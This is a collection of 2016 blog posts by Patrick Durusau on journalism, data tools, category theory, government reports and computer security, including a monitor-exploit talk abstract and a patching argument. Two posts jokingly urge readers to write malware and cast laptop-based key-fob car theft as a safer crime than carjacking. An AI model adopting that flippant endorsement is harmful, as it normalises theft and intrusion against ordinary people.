Another Word For It: Patrick Durusau on Topic Maps and Semantic Diversity

August 10, 2016

50 ways to measure your analytics

Filed under: Journalism,News,Reporting — Patrick Durusau @ 8:24 am

50 ways to measure your analytics (with apologies to Paul Simon) by Melody Kramer.

From the post:

“The problem is all inside your figures,” she said to me.
“The answer is easy if you think more than numerically.
I’d like to help you in your struggle to count your impact perfectly.
There must be (at least) 50 ways to measure success for a news article.”

She said, “It’s really not my habit to really think about the news.
Furthermore, I hope my meaning won’t be lost or misconstrued.
But I’ll repeat myself, at the risk of being crude:
There must be 50 ways to assess whether your piece is reaching the full potential audience it could.

Fifty ways to count your numbers.'”

You will have to find mechanisms to measure your analytics but Melody does give you fifty (50) things to measure!

Clever use of the Paul Simon lyrics.

Suggest a “trigger warning” that doesn’t give away the trigger in this case? 😉

Stochastic Terrorism – Usage Prior To January 10, 2011?

Filed under: Language — Patrick Durusau @ 8:05 am

With Donald Trump’s remarks today, you know that discussions of stochastic terrorism are about to engulf social media.

Anticipating that, I tried to run down some facts on the usage of “stochastic terrorism.”

As a starting point, Google NGrams comes up with zero (0) examples up to the year 2000.

One blog I found, appropriately named Stochastic Terrorism, has only one post, dated January 26, 2011, and may share an author with Stochastic Terrorism: Triggering the shooters (Daily Kos, January 10, 2011), which has a closely similar companion post: Glenn Beck- Consider yourself on notice *Pictures fixed* (Daily Kos, July 26, 2011). The January 10, 2011 post may be the origin of the phrase.

The Corpus of Contemporary American English, which is complete up to 2015, reports zero (0) hits for “stochastic terrorism.”

NOW Corpus (News on the Web) reports three (3) hits for “stochastic terrorism.”

July 18, 2016 – Salon. All hate is not created equal: The folly of perceiving murderers like Dylann Roof, Micah Johnson and Gavin Long as one and the same by Chauncey DeVega.

Dylann Roof was delusional; his understanding of reality colored by white racial paranoiac fantasies. However, Roof was not born that way. He was socialized into hatred by a right-wing news media that encourages stochastic terrorism among its audience by the repeated use of eliminationist rhetoric, subtle and overt racism against non-whites, conspiracy theories, and reactionary language such as “real America” and “take our country back.”

In case you don’t have the context for Dylann Roof:

Roof is a white supremacist. Driven by that belief, he decided to kill 9 unarmed black people after a prayer meeting in Charleston, South Carolina’s Emanuel AME Church. Roof’s manifesto explains that he wanted to kill black people because white people were “oppressed” in their “own country,” “illegal immigrants” and “Jews” were ruining the United States, and African-Americans are all criminals. Like other white supremacists and white nationalists (and yes, many “respectable” white conservatives as well) Roof’s political and intellectual cosmology is oriented around a belief that white Americans are somehow marginalized or treated badly in the United States. This is perverse and delusional: white people are the most economically and politically powerful racial group in the United States; American society is oriented around the protection of white privilege.

“Stochastic terrorism” occurs twice in:

December 7, 2015 The American Conservative. The Challenge of Lone Wolf Terrorism by Philip Jenkins.

Jenkins covers at length “leaderless resistance:”


Amazingly, the story goes back to the U.S. ultra-Right in the 1980s. Far Rightists and neo-Nazis tried to organize guerrilla campaigns against the U.S. government, which caused some damage but soon collapsed ignominiously. The problem was the federal agencies had these movements thoroughly penetrated, so that every time someone planned an attack, it was immediately discovered by means of either electronic or human intelligence. The groups were thoroughly penetrated by informers.

The collapse of that endeavor led to some serious rethinking by the movement’s intellectual leaders. Extremist theorists now evolved a shrewd if desperate strategy of “leaderless resistance,” based on what they called the “Phantom Cell or individual action.” If even the tightest of cell systems could be penetrated by federal agents, why have a hierarchical structure at all? Why have a chain of command? Why not simply move to a non-structure, in which individual groups circulate propaganda, manuals and broad suggestions for activities, which can be taken up or adapted according to need by particular groups or even individuals?

The phrase “stochastic terrorism” occurs twice in the piece, both times in a single comment:

Are they leaderless resistance tactics or is this stochastic terrorism? Stochastic terrorism is the use of mass communications/media to incite random actors to carry out violent or terrorist acts that are statistically predictable but individually unpredictable. That is, remote-control murder by lone wolf. This is by no means the sole province of one group.

The thread ends shortly thereafter with no one picking up on the distinction between “leaderless resistance,” and “stochastic terrorism,” if there is one.

I don’t have a publication date for Stochastic Terrorism? by Larry Wohlgemuth (the lack of dating on web content being a rant for another day), which says:

Everybody was certain it would happen, and in the wake of the shooting in Tucson last week only the most militant teabagger was able to deny that incendiary rhetoric played a role. We knew this talk of crosshairs, Second Amendment remedies and lock and load eventually would have repercussions, and it did.

Only the most obtuse can deny that, if you talk long enough about picking up a gun and shooting people, marginal personalities and the mentally ill will respond to that suggestion. Feebleminded and disturbed people DO exist, and to believe these words wouldn’t affect them seemed inauthentic at best and criminal at worst.

Now that the unthinkable has happened, people on the left want to shove it down the throats of wingers that are denying culpability. Suddenly, like Manna from heaven, a radical new “meme” was gifted to people intended to buttress their arguments that incendiary rhetoric does indeed result in violent actions.

It begs the question, what is stochastic terrorism, and how does it apply to the shooting in Tucson.

This diary on Daily Kos by a member who calls himself G2geek was posted Monday, January 10, two days after the tragedy in Tucson. It describes in detail the mechanisms whereby “stochastic terrorism” works, and who’s vulnerable to it. Here’s the diarist’s own words in explaining stochastic terrorism:

Which puts the origin of “stochastic terrorism” back at the Daily Kos post of January 10, 2011, Stochastic Terrorism: Triggering the shooters, which appeared two days after U.S. Representative Gabrielle Giffords and eighteen others were shot in Tucson, Arizona.

As of this morning, a popular search engine returns 536 “hits” for “stochastic terrorist,” and 12,300 “hits” for “stochastic terrorism.”

The term “stochastic terrorism” isn’t a popular one, perhaps it isn’t as easy to say as “…lone wolf.”

My concern is the potential use of “stochastic terrorism” to criminalize free speech and to intimidate speakers into self-censorship.

Not to mention that Privilege should be written with a capital P when you can order the deaths of foreign leaders and prosecute anyone who suggests that violence is possible against you. Now that’s Privilege.

Suggestions on further sources?

August 9, 2016

ARGUS

Filed under: Distributed Computing,Functional Programming,Programming — Patrick Durusau @ 7:01 pm

ARGUS by Christopher Meiklejohn.

From the post:

This is one post in a series about programming models and languages for distributed computing that I’m writing as part of my history of distributed programming techniques.

Relevant Reading

  • Abstraction Mechanisms in CLU, Liskov, Barbara and Snyder, Alan and Atkinson, Russell and Schaffert, Craig, CACM 1977 (Liskov et al. 1977).
  • Guardians and Actions: Linguistic Support for Robust, Distributed Programs, Liskov, Barbara and Scheifler, Robert, TOPLAS 1982 (Liskov and Scheifler 1983).
  • Orphan Detection in the Argus System, Walker, Edward Franklin, DTIC 1984 (Walker 1984).
  • Implementation of Argus, Liskov, Barbara and Curtis, Dorothy and Johnson, Paul and Scheifler, Robert, SIGOPS 1987 (Liskov et al. 1987).
  • Distributed Programming in Argus, Liskov, Barbara CACM 1988 (Liskov 1988).

I’m thinking about how to fix an XFCE trackpad problem, and while I think about that, I wanted to touch up the references from Christopher’s post.

Apologies but I was unable to find a public version of: Implementation of Argus, Liskov, Barbara and Curtis, Dorothy and Johnson, Paul and Scheifler, Robert, SIGOPS 1987 (Liskov et al. 1987).

Hoping that easier access to most of the relevant reading will increase your enjoyment of Christopher’s post.

Enjoy!

Using Excel To Squash Duplicates

Filed under: Duplicates,Excel — Patrick Durusau @ 6:28 pm

How to use built-in Excel features to find duplicates by Susan Harkins.

From the post:

Duplicate values aren’t bad. In fact, most are necessary. However, duplicate records can skew reporting and analysis. Whether you’re finding duplicates in a single column or looking for duplicate records, Excel can do most of the work for you. In this article, I’ll show you easy ways to find duplicates by applying advanced filtering options and conditional formatting rules. First, we’ll define the term duplicate—it isn’t ambiguous, but context determines its meaning. Then, we’ll use Excel’s built-in features to find duplicates.

If the first paragraph hadn’t caught my attention, then:

Your definition of duplicate will depend on the business rule you’re applying.

certainly would have!

The same rule holds true for subject identity. It really depends on the business rule (read requirement) for your analysis.

In some cases subjects may appear as topics/proxies but be ignored, or their associations with other subjects may be ignored.

Or for some purposes, what were separate topics/proxies may form group subjects with demographic characteristics such as age, gender, voting status, etc.

If you are required to use Excel and bedeviled by duplicates, you will find this post quite useful.
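
If you later need the same business-rule-driven notion of “duplicate” outside of Excel, the idea translates directly to code. A minimal sketch in TypeScript (my illustration, not from Harkins’ article; the record shape and rules are made up):

```typescript
// Hypothetical record shape; swap in whatever your data actually has.
interface Contact {
  firstName: string;
  lastName: string;
  email: string;
  city: string;
}

// A "business rule" is just a function that reduces a record to a key.
type BusinessRule<T> = (record: T) => string;

// Keep the first record seen for each key; everything else is a duplicate.
function dedupe<T>(records: T[], rule: BusinessRule<T>): T[] {
  const seen = new Map<string, T>();
  for (const record of records) {
    const key = rule(record);
    if (!seen.has(key)) {
      seen.set(key, record);
    }
  }
  return [...seen.values()];
}

// Two different rules, two different answers to "what is a duplicate?"
const byEmail: BusinessRule<Contact> = (c) => c.email.toLowerCase();
const byNameAndCity: BusinessRule<Contact> = (c) =>
  `${c.lastName.toLowerCase()}|${c.firstName.toLowerCase()}|${c.city.toLowerCase()}`;

const contacts: Contact[] = [
  { firstName: "Pat", lastName: "Smith", email: "pat@example.com", city: "Atlanta" },
  { firstName: "Patricia", lastName: "Smith", email: "PAT@example.com", city: "Atlanta" },
];

console.log(dedupe(contacts, byEmail).length);       // 1: same email, duplicate squashed
console.log(dedupe(contacts, byNameAndCity).length); // 2: different first names, both kept
```

Change the rule and the set of “duplicates” changes with it, which is exactly the point about subject identity above.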

ACHE Focused Crawler

Filed under: ElasticSearch,Record Linkage,Webcrawler — Patrick Durusau @ 4:51 pm

ACHE Focused Crawler

From the webpage:

ACHE is an implementation of a focused crawler. A focused crawler is a web crawler that collects Web pages that satisfy some specific property. ACHE differs from other crawlers in the sense that it includes page classifiers that allow it to distinguish between relevant and irrelevant pages in a given domain. The page classifier can range from a simple regular expression (that matches every page that contains a specific word, for example), to a sophisticated machine-learned classification model. ACHE also includes link classifiers, which allow it to decide the best order in which the links should be downloaded in order to find the relevant content on the web as fast as possible, while not wasting resources downloading irrelevant content.

[Image: ache-logo-400]

The inclusion of machine learning (Weka) and robust indexing (ElasticSearch) means this will take more than a day or two to explore.

Certainly well suited to exploring all the web accessible resources on narrow enough topics.
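
To make the page-classifier idea in the quote above concrete, here is a minimal sketch of the “simple regular expression” end of the spectrum, in TypeScript. This is purely illustrative and is not ACHE’s actual API:

```typescript
// A page classifier decides whether a fetched page is relevant to the domain.
interface PageClassifier {
  isRelevant(url: string, body: string): boolean;
}

// The simplest possible classifier: a page is relevant if it matches a pattern.
class RegexPageClassifier implements PageClassifier {
  constructor(private readonly pattern: RegExp) {}

  isRelevant(_url: string, body: string): boolean {
    return this.pattern.test(body);
  }
}

// A focused crawler would consult the classifier before queueing a page's links.
const classifier: PageClassifier = new RegexPageClassifier(/record linkage/i);

const keep = classifier.isRelevant(
  "https://example.com/page",
  "An introduction to record linkage and entity resolution...",
);
console.log(keep); // true: the page would be kept and its links queued
```

A machine-learned classifier slots into the same interface; only the decision inside isRelevant changes.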

I was thinking about doing a “9 Million Pages of Donald Trump,” (think Nine Billion Names of God) but a quick sanity check showed there are already more than 230 million such pages.

Perhaps by the election I could produce “9 Million Pages With Favorable Comments About Donald Trump.” Perhaps if I don’t dedupe the pages found by searching it would go that high.

Other topics for comprehensive web searching come to mind?

PS: The many names of record linkage come to mind. I think I have thirty (30) or so.

A Monitor Darkly:… [An IoT in your monitor?]

Filed under: Cybersecurity,IoT - Internet of Things,Security — Patrick Durusau @ 3:52 pm

A Monitor Darkly: Reversing and Exploiting Ubiquitous On-Screen-Display Controllers in Modern Monitors by Ang Cui, Jatin Kataria, Francois Charbonneau.

Abstract:

There are multiple x86 processors in your monitor! OSD, or on-screen-display controllers are ubiquitous components in nearly all modern monitors. OSDs are typically used to generate simple menus on the monitor, allowing the user to change settings like brightness, contrast and input source. However, OSDs are effectively independent general-purpose computers that can: read the content of the screen, change arbitrary pixel values, and execute arbitrary code supplied through numerous control channels. We demonstrate multiple methods of loading and executing arbitrary code in a modern monitor and discuss the security implication of this novel attack vector.

We also present a thorough analysis of an OSD system used in common Dell monitors and discuss attack scenarios ranging from active screen content manipulation and screen content snooping to active data exfiltration using Funtenna-like techniques. We demonstrate a multi-stage monitor implant capable of loading arbitrary code and data encoded in specially crafted images and documents through active monitor snooping. This code infiltration technique can be implemented through a single pixel, or through subtle variations of a large number of pixels. We discuss a step-by-step walk-through of our hardware and software reverse-analysis process of the Dell monitor. We present three demonstrations of monitoring exploitation to show active screen snooping, active screen content manipulation and covert data exfiltration using Funtenna.

Lastly, we discuss realistic attack delivery mechanisms, show a prototype implementation of our attack using the USB Armory and outline potential attack mitigation options. We will release sample code related to this attack prior to the presentation date.

This hack is surprising only in that discussions of the insecurity of the Internet of Things (IoT) have failed to mention the mini-Internet of Things sitting on our desktops.

The video of the presentation isn’t up on the BlackHat YouTube channel, yet. But check back.

Pro-tip: If you write about this hack, don’t say it uses “…unnoticeable sound waves…” to connect to a radio receiver. Radio waves != sound waves. Radio waves are electromagnetic radiation and sound waves are mechanical waves.

How to avoid 10 common mistakes in data reporting [Plus #11]

Filed under: Journalism,News,Reporting — Patrick Durusau @ 2:51 pm

How to avoid 10 common mistakes in data reporting by Catherine Sheffo.

From the post:

After getting your hands on a data set, the hardest part of incorporating data analysis into your beat is getting started — and avoiding beginners’ pitfalls along the way.

From scrambled columns to unintelligible field names, every file you receive comes with challenges for new and experienced data reporters alike.

We talked to Sean Mussenden, chief of the data and graphics bureau at the University of Maryland’s Capital News Service, about 10 mistakes to avoid while you establish a workflow and get comfortable with data sets in your day-to-day reporting.

Topic map fans will recognize #5:

Mistake No. 5 – Assuming you know what the field names mean

That can easily extend to what is in the fields as well.

I would add:

Mistake No. 11 – Assuming data is truthful and unbiased

Always bear in mind data given to you has been “cooked.”

Data has been omitted, changed or added, however “raw” the data may appear to you. The act of collecting data involves omission, changes and additions. All from a point of view.

Not to mention whoever gave you data had an agenda as well.

There’s no escape from bias, but you can work at serving your own agenda and not someone else’s.

Start Writing Malware Today!

Filed under: Cybersecurity — Patrick Durusau @ 2:29 pm

Chris Baraniuk’s report: ‘Project Sauron’ malware hidden for five years should light a fire under your ass to write malware today!

If you wait too long, all the good names for malware are going to be taken!

From the post:

The malware may have been designed by a state-sponsored group.

It can disguise itself as benign files and does not operate in predictable ways, making it harder to detect.

Experts from Kaspersky Lab and Symantec said it allows the attacker to spy on infected computers.

In September last year, Kaspersky first detected the malware on an unspecified “government organisation” network.

Since then, the firm claims to have found evidence of Project Sauron at more than 30 organisations in Russia, Iran and Rwanda.

These were generally government, scientific, military, telecoms and financial organisations, according to Kaspersky.

Separately, Symantec said it had found the malware in other countries, including at an airline in China and an embassy in Belgium.

You don’t want to get caught like the inventors of SCSI, who thought it should be pronounced “sexy,” only for it to become known as “scuzzy.”

Nobody wants to be “there goes N, creator of the scuzzy malware.”

How embarrassing.

Almost as much as the experts missing Project Sauron for five years.

With ten-year-old vulnerabilities still in play and experts asleep at the switch for five years, isn’t it time to presume all data is insecure?

That sets a common starting point for debating how much money should be spent making X data how secure.

Even data at the NSA is insecure, as Edward Snowden so ably demonstrated. The question is how much you are willing to spend for a certain amount of security.

Or to put it differently, security is never cheap nor absolute.

August 8, 2016

U.S. Government Open Source Pilot – Hidden Costs? (Vulnerabilities?)

Filed under: Government,Open Source — Patrick Durusau @ 4:38 pm

Federal Source Code Policy: Achieving Efficiency, Transparency, and Innovation through Reusable and Open Source Software by Tony Scott and Anne E. Rung.

From the post:

The U.S. Government is committed to improving the way Federal agencies buy, build, and deliver information technology (IT) and software solutions to better support cost efficiency, mission effectiveness, and the consumer experience with Government programs. Each year, the Federal Government spends more than $6 billion on software through more than 42,000 transactions. A significant proportion of software used by the Government is comprised of either preexisting Federal solutions or commercial solutions. These solutions include proprietary, open source, and mixed source code and often do not require additional custom code development.

When Federal agencies are unable to identify an existing Federal or commercial software solution that satisfies their specific needs, they may choose to develop a custom software solution on their own or pay for its development. When agencies procure custom-developed source code, however, they do not necessarily make their new code (source code or code) broadly available for Federal Government-wide reuse. Even when agencies are in a position to make their source code available on a Government-wide basis, they do not make such code available to other agencies in a consistent manner. In some cases, agencies may even have difficulty establishing that the software was produced in the performance of a Federal Government contract. These challenges may result in duplicative acquisitions for substantially similar code and an inefficient use of taxpayer dollars. This policy seeks to address these challenges by ensuring that new custom-developed Federal source code be made broadly available for reuse across the Federal Government. This is consistent with the Digital Government Strategy’s “Shared Platform” approach, which enables Federal employees to work together—both within and across agencies—to reduce costs, streamline development, apply uniform standards, and ensure consistency in creating and delivering information. Enhanced reuse of custom-developed code across the Federal Government can have significant benefits for American taxpayers, including decreasing duplicative costs for the same code and reducing Federal vendor lock-in.

This policy also establishes a pilot program that requires agencies, when commissioning new custom software, to release at least 20 percent of new custom-developed code as Open Source Software (OSS) for three years, and collect additional data concerning new custom software to inform metrics to gauge the performance of this pilot. (footnotes omitted)

This open source pilot is a good example of government leadership. After open source has become the virtual default of private industry, the government decided to conduct a three-year pilot project to assess the concept.

Not a bad idea but someone needs to ramp up to track every open source release from the federal government.

Such releases need to be evaluated for the costs of new security bugs introduced into the software ecosystem and for the effects of poor programming practices on software development.

Otherwise, a rosy picture of reduced duplicative costs for the same code may conceal higher software costs due to widespread security vulnerabilities.

Trust is ok, verification is better.

Imaginative Hacking – Delta Flights Delayed Worldwide

Filed under: Cybersecurity,Security — Patrick Durusau @ 10:56 am

Delta Flights Grounded For Hours Due To Worldwide System Outage by Camila Domonoske.

From the post:

Delta flights around the world were delayed this morning due to a “computer outage,” the company says.

A power outage in Atlanta around 2:30 a.m. ET was responsible for the problem, the company said in a statement.

“We are aware that flight status systems, including airport screens, are incorrectly showing flights on time,” Delta says. Meanwhile, passengers attempting to check in online or through Delta’s app have reported seeing error messages.

The problem is “system-wide” and happening “everywhere,” the company has said.
….

No causes have been specified for the “power outage.”

But a good example of how imaginative hacking can bring down a worldwide transportation system, without ever breaching computer security.

Delta computer security is probably as good as airline security gets, but who needs root access when you can pull the power plug?

A real world denial of service (DoS) attack.

PS: How many degrees of separation does your computer security encompass?

August 7, 2016

Hierarchy of Disagreement – Trump On Nuclear Weapons

Filed under: Argumentation,Journalism,News,Reporting — Patrick Durusau @ 3:50 pm

[Image: disagreement-levels-460]

Politicians? Politicians?

Hell, I would be happy if news commentators and “experts” that appear on news shows would rise above contradiction.

Repetition, especially repeating what other commentators have said, isn’t evidence, it’s just noise.

If the medium you are using doesn’t support robust referencing of facts and analysis, you are using the wrong medium.

Or should that be … “you are following the wrong medium?”

You remember the Dilbert cartoon about the evening news, Sunday February 07, 1993 with the line:

A new poll shows that many voters have strong opinions on these issues despite the fact that we provide no useful contextual data.

That is a great summary of news reporting on top issues of the day. On occasion NPR will have an in-depth analysis but it repeats the stories of the day with little context, just like other media outlets.

Granting that is a limitation of the medium, why not use the Internet to deliver the context that video or radio lack the time to deliver, using video or radio as a highlights or awareness service, with further details collected and organized for viewers and listeners?

Despite timely, accurate and moving news reporting, I don’t have a regular source that provides in-depth context for everyday news stories.

For example, the internet was aflame with news of Trump asking “…why he could not use nuclear weapons?” Or at least that was the headline.

Some reports did pick up the contradiction in spending billions of dollars on weapons you aren’t using (and don’t intend to use?), but they were few and far between. And of those that did, how many examined the economic drivers that have created a useless-product industry, the one that produces nuclear weapons?

In case you are curious, the United States has steadfastly refused to renounce first strike as a military strategy. (Report on Nuclear Employment Strategy of the United States, 2010, yes, during President Obama’s first term in office).

Do you recall seeing in depth reporting or analysis of either of those two aspects of the use of nuclear arms issue?

There was a lot of huffing, puffing and strutting around as I recall but little in the way of substantive or contextual analysis.

Don’t Car Jack! Hack!

Filed under: Cybersecurity — Patrick Durusau @ 10:33 am

Two thieves in Houston, Texas have demonstrated a safe alternative to car jacking, car hacking!

We have all seen news videos of car jacking incidents:

It is no longer necessary for thieves to endanger others or to face the harsh penalties for car jacking.

Here’s the gist of the story:


The two men have also been filmed during a theft of a Jeep Wrangler, the surveillance video shows the suspects got under the hood, cut wires of an alarm and then jumped inside the SUV. Once inside, he used the database and the vehicle identification number to program a new key fob for the Jeep.

Once inside the vehicle, the criminals used a laptop running software that accessed a database of vehicle identification numbers to program a new key fob.

Houston police identified and arrested two men while investigating a series of car thefts carried out using pirated software running on the thieves’ laptop.

Advantages to car hacking:

  • Thieves focus on newer model cars
  • No endangerment of drivers
  • Lesser penalties:

    The federal armed carjacking law, which took effect in 1992, carries penalties of up to 15 years in prison for each count; 25 years if someone is seriously injured; and life in prison or the death penalty if someone is killed. If a gun is used in the carjacking, extra years are added to the sentence. (Carjackers will drive themselves to severe penalties in Detroit)

  • No high speed police chases endangering innocent others

Finally, an advance in technology that benefits drivers, thieves, police and the public. Who would have thought?

August 6, 2016

Attribution of Hacks – Hard, Repeating Claimed Attributions – Easy

Filed under: Cybersecurity — Patrick Durusau @ 8:06 pm

[Image: attribution-460]

A cautionary slide from #defcon on attribution of hacks.

Lessons that seem lost on media outlets that repeat attributions in headlines but leave equivocation on attributions buried in text.

You don’t have to go as far as I would: “Known Liars and Putin Haters Attribute Hack to Russia.”

But a “liar as source” alert at the beginning of an article would give readers a shot at forming a considered opinion of a parroted tale from agency sources.

Congressional Research Service Fiscal 2015 – Full Report List

Filed under: CRS,Government,Government Data,Open Access — Patrick Durusau @ 4:25 pm

Congressional Research Service Fiscal 2015

The Director’s Message:

From international conflicts and humanitarian crises, to immigration, transportation, and secondary education, the Congressional Research Service (CRS) helped every congressional office and committee navigate the wide range of complex and controversial issues that confronted Congress in FY2015.

We kicked off the year strongly, preparing for the newly elected Members of the 114th Congress with the tenth biannual CRS Seminar for New Members, and wrapped up 2015 supporting the transition to a new Speaker and the crafting of the omnibus appropriations bill. In between, CRS experts answered over 62,000 individual requests; hosted over 7,400 Congressional participants at seminars, briefings and trainings; provided over 3,600 new or refreshed products; and summarized over 8,000 pieces of legislation.

While the CRS mission remains the same, Congress and the environment in which it works are continually evolving. To ensure that the Service is well positioned to anticipate and meet the information and research needs of a 21st-century Congress, we launched a comprehensive strategic planning effort that has identified the most critical priorities, goals, and objectives that will enable us to most efficiently and effectively serve Congress as CRS moves into its second century.

Responding to the increasingly rapid pace of congressional business, and taking advantage of new technologies, we continued to explore new and innovative ways to deliver authoritative information and timely analysis to Congress. For example, we introduced shorter report formats and added infographics to our website CRS.gov to better serve congressional needs.

It is an honor and privilege to work for the U.S. Congress. With great dedication, our staff creatively supports Members, staff and committees as they help shape and direct the legislative process and our nation’s future. Our accomplishments in fiscal 2015 reflect that dedication.

All true but also true that the funders of all those wonderful efforts, taxpayers, have spotty and/or erratic access to those research goodies.

Perhaps that will change in the not too distant future.

But until then, perhaps the list of all new CRS products in 2015, which runs from page 47 to page 124, may be of interest.

Not all entries are unique as they may appear under different categories.

Sadly the only navigation you are offered is by chunky categories like “Health” and “Law and Justice.”

Hmmm, perhaps that can be fixed, at least to some degree.

Watch for more CRS news this coming week.

Cyber Security Reports – 2016

Filed under: Cybersecurity,Security — Patrick Durusau @ 2:12 pm

While casting about for statistics on hacking I ran across two cyber security reports that need to be on your reading list:

Verizon’s 2016 Data Breach Investigations Report, in part because it shares its database of incident reports, a novelty in the area of cyber security.

2016 NTT Group, Global Threat Intelligence Report, which does not share the underlying data.

Both will repay a close reading several times over.

Enjoy!

PS: I extracted the statistics I needed for a post but I’m going to give both reports a slow read. My only regret is that the contents are trapped in dead PDF files, making it difficult to reuse or repurpose with other data.

I am reminded that MarkLogic has an xdmp:pdf-convert function.

No ‘Raiders of the Lost Ark’ Stockpile? You Are Still In Danger!

Filed under: Cybersecurity,NSA,Security — Patrick Durusau @ 1:45 pm

NSA denies ‘Raiders of the Lost Ark’ stockpile of security vulnerabilities by Alex Hern.

From the post:

America’s National Security Agency (NSA) spends upwards of $25m in a year buying previously undisclosed security vulnerabilities – known as zero days, because that’s the length of time the target has had to fix them – but the large investment may not result in as much of a collection of hacking capabilities as is widely assumed.

Jason Healey, a senior research scholar at Columbia University and director at the Atlantic Council policy thinktank, argues that the true number of zero days stockpiled by the NSA is likely in the “dozens”, and that the agency only adds to that amount by a very small amount each year. “Right now it looks like single digits,” he says, adding that he has “high confidence in this assessment.”

One key piece of evidence comes from the NSA itself, which in 2015 claimed that 91% of vulnerabilities it procured were eventually disclosed to the vendors whose products were at risk. Of the other 9%, at least some of those weren’t disclosed because they were fixed before they could be, the agency adds.

Similarly, the White House has revealed that in one year since the current disclosure policy was implemented, it reviewed about 100 software vulnerabilities discovered by the NSA to determine if they should be disclosed, and “kept only about two”. Healey adds that in the autumn of 2014, he was personally told that every single vulnerability which had come up for review had been disclosed.

No amount of factual reporting is likely to dispel the myth of an NSA hoard of zero days.

However, the Verizon 2016 Data Breach Investigations Report makes it clear that zero days aren’t the main source of hacking danger:

[Image: verizon-2016-460]

That’s not an error! Vulnerabilities from before 1999 are still being exploited.

You can spend your days discussing rumors of the latest zero day, or you can insist that IT follow a verified patch-application process.

How effective is patching known vulnerabilities?

The top 10 internal vulnerabilities accounted for over 78 percent of all internal vulnerabilities during 2015. All 10 internal vulnerabilities are directly related to outdated patch levels on the target systems. (2016 NTT Group, Global Threat Intelligence Report, page 5. Emphasis in original.)

Routine patching can reduce your internal vulnerabilities by 78% (on average).

That’s a clear, actionable, measurable requirement.

Call up your IT department, ask for a list of all the software in your enterprise and a list of patches that have been applied to each instance and those waiting to be applied (as per the vendor).
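
Once that list is in a structured form, the measurement itself is trivial. A hedged sketch in TypeScript (the inventory shape is hypothetical, nothing vendor-specific) of computing patch coverage:

```typescript
// Hypothetical inventory entry: one installed instance of one product.
interface SoftwareInstance {
  product: string;
  host: string;
  patchesApplied: string[];   // patch IDs already installed
  patchesAvailable: string[]; // patch IDs the vendor has published
}

// An instance is "current" when every available patch has been applied.
function isCurrent(instance: SoftwareInstance): boolean {
  const applied = new Set(instance.patchesApplied);
  return instance.patchesAvailable.every((p) => applied.has(p));
}

// Percentage of instances that are fully patched.
function patchCoverage(inventory: SoftwareInstance[]): number {
  if (inventory.length === 0) return 100;
  const current = inventory.filter(isCurrent).length;
  return (100 * current) / inventory.length;
}

const inventory: SoftwareInstance[] = [
  { product: "webserver", host: "dmz-1", patchesApplied: ["p1"], patchesAvailable: ["p1", "p2"] },
  { product: "database", host: "db-1", patchesApplied: ["p1", "p2"], patchesAvailable: ["p1", "p2"] },
];

console.log(patchCoverage(inventory)); // 50: half the estate is behind on patches
```

A single number like that is easy to put in front of management and easy to track week over week.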

Remember, a data breach may be IT’s “fault,” but it may be your job that is at risk.

PS: One of the earliest uses of topic maps was to track software on a university network.

August 5, 2016

The Comprehensive LaTeX Symbol List

Filed under: TeX/LaTeX — Patrick Durusau @ 9:03 pm

The Comprehensive LaTeX Symbol List by Scott Pakin.

Abstract:

This document lists 14032 symbols and the corresponding LaTeX commands that produce them. Some of these symbols are guaranteed to be available in every LaTeX 2ε system; others require fonts and packages that may not accompany a given distribution and that therefore need to be installed. All of the fonts and packages used to prepare this document—as well as this document itself—are freely available from the Comprehensive TeX Archive Network (http://www.ctan.org/).

For unfortunates who print to A4 paper: http://tug.ctan.org/info/symbols/comprehensive/symbols-a4.pdf.

Perhaps not as challenging as giving Unicode character names for random representative glyphs but at 14032 symbols, certainly enough material to keep you busy for several long afternoons!

Enjoy!

Category theory definition dependencies

Filed under: Category Theory,Mathematical Reasoning,Mathematics — Patrick Durusau @ 8:39 pm

Category theory definition dependencies by John D. Cook.

From the post:

The diagram below shows how category theory definitions build on each other. Based on definitions in The Joy of Cats.

[Image: category_concepts-460]

You will need John’s full size image for this to really be useful.

Prints to 8 1/2 x 11 paper.

Here’s a test of your understanding of category theory.

Use John’s dependency graph and on (several) separate pages, jot down your understanding of each term.
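
As a sample of what one such jotting might look like, here is the root definition that most of the other nodes build on, in standard textbook form (my phrasing, not quoted from The Joy of Cats; the LaTeX assumes an amsthm-style definition environment):

```latex
% Standard definition of the root node of the dependency graph.
\begin{definition}[Category]
A category $\mathcal{C}$ consists of a class of objects $\mathrm{Ob}(\mathcal{C})$;
for each pair of objects $A, B$ a collection of morphisms $\mathcal{C}(A,B)$;
for each object $A$ an identity morphism $\mathrm{id}_A \in \mathcal{C}(A,A)$; and a
composition $\circ \colon \mathcal{C}(B,C) \times \mathcal{C}(A,B) \to \mathcal{C}(A,C)$,
such that composition is associative,
$h \circ (g \circ f) = (h \circ g) \circ f$, and the identities are units,
$\mathrm{id}_B \circ f = f = f \circ \mathrm{id}_A$ for every $f \in \mathcal{C}(A,B)$.
\end{definition}
```

If your own version matches the dependency graph's downstream definitions (functor, natural transformation, and so on), you are in good shape.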

Node XL (641 Pins)

Filed under: Graphs,NodeXL,Visualization — Patrick Durusau @ 8:17 pm

Node XL

Just a quick sample:

[Image: node-xl-pins-460]

That’s only a sample, another 629 await your viewing (perhaps more by the time you read this post).

I have a Pinterest account, but this is the first set of pins I have chosen to follow.

Suggestions of similar visualization boards at Pinterest?

Enjoy!

Google Deletes Palestine Or Does It?

Filed under: Mapping,Maps,Politics — Patrick Durusau @ 7:52 pm

Have you heard that Google removed Palestine from Google Maps on 25 July 2016?

At first blush (warning, spoiler to this story coming):

Searching for Israel:

[Image: israel-google-map-460]

Searching for Palestine:

[Image: palestine-google-460]

Do you see a label for Palestine? Despite the sidebar in Google Maps reporting:

The State of Palestine, also known simply as Palestine, is a de jure sovereign state in the Middle East that is recognized by 136 UN members and since 2012 has a status of a non-member observer state…

Searching further I found more discussions about Google removing Palestine from Google Maps, but with conflicting dates.

That sent me to the Internet Archive WayBack Machine where I found Google Maps for Israel as follows:

2010:

[Image: google-maps-11-15-2010-israel-460]

2012:

[Image: google-maps-11-15-2012-israel-460]

2014:

[Image: google-maps-10-01-2014-israel-460]

Some observations:

West Bank appears in 2010 but not thereafter.

Gaza is labeled if you search for Palestine but unlabeled if you search for Israel (first two images).

Curious: is there another state, recognized by 136 UN members, that does not appear by name in Google Maps?

The coverage of Google Maps gets spotty the further back you go in the Internet Archive. That is unfortunate, because the Archive is likely the only trusted witness to ever-changing digital content.

On the whole, reports of Google deleting Palestine from Google Maps are false. Google never identified Palestine at all.

That’s not a defense to Google’s failure to identify Palestine but an attempt to illustrate Google’s historical failure to identify Palestine.

$hell on Earth: From Browser to System Compromise

